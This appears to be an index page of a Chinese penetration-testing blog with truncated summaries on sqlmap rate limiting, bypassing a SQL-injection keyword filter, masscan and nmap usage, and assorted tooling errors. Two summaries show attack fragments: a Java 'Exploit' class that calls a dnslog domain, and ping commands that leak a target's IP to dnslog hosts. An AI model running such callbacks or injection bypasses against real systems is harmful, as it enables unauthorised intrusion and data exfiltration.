摘要:
sqlmap qps控制 0X01 发包函数限制器 首先寻找一下SQLMAP的请求发包函数 请求函数为 \lib\request\connect.py里的 getPage()函数 所以在getPage函数上加个自定义的装饰器,用来计算每一次的QPS、延迟QPS超标后的请求就好了 0X02 文件修改检 阅读全文
摘要:
今天注入时遇到RD对注入点布置了一层拦截、一层过滤。 拦截基于黑名单,将UNION/AND这些开发能想到的做了拦截。 过滤不知道用的什么,会将关键字转换为 forbid。 经过报错提示,闭合符号是 ")" ,后端SQL逻辑为 a) \n and a.area_id in(1,2,3,4) \nand 阅读全文
摘要:
不知道从什么时候开始,python开始报 out of memory。 把pycharm64.exe.vmoptions Xmx 调成1024m或者2048m pycharm就打不开了 低了不能用,高了打不开 最后再这里看到了灵感 https://blog.csdn.net/qq_41973208/ 阅读全文
摘要:
# https://github.com/robertdavidgraham/masscan cd /opt yum install -y git gcc make libpcap-dev git clone https://github.com/robertdavidgraham/masscan 阅读全文
摘要:
但这里无法修改content type,看源码看了半天,urllib在POST时内置了content type,即使再add 上content type,也是两个content type,服务器只认第一个。 所以遇到rest ful 风格的POST接口,要不改源码要不换requests吧。 阅读全文
摘要:
``` @ 将前面的host变成用户名 二进制方式 host不带 "." ``` 阅读全文
摘要:
OperationalError: (2004, "Can't create TCP/IP socket (24)") socket报错 https://blog.csdn.net/liruidong01/article/details/88601094 http://blog.chinaunix. 阅读全文
摘要:
exclude ports (Exclude the specified ports from scanning) https://nmap.org/book/man port specification.html 阅读全文
摘要:
``` public class Exploit { public Exploit(){ String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址 String win_dnslog = "windows" + base_url; // windows 阅读全文
摘要:
``` IP: 适用于 eth0 inet addr: IP的情况 ping .vivo_fj_ip.q734y5p2.dnslog58.top ping ip. .kiwe2t.dnslog.cn 适用于 eth0 IP的情况 ping .vivo_fj_ip.q734y5p2.dnslog58. 阅读全文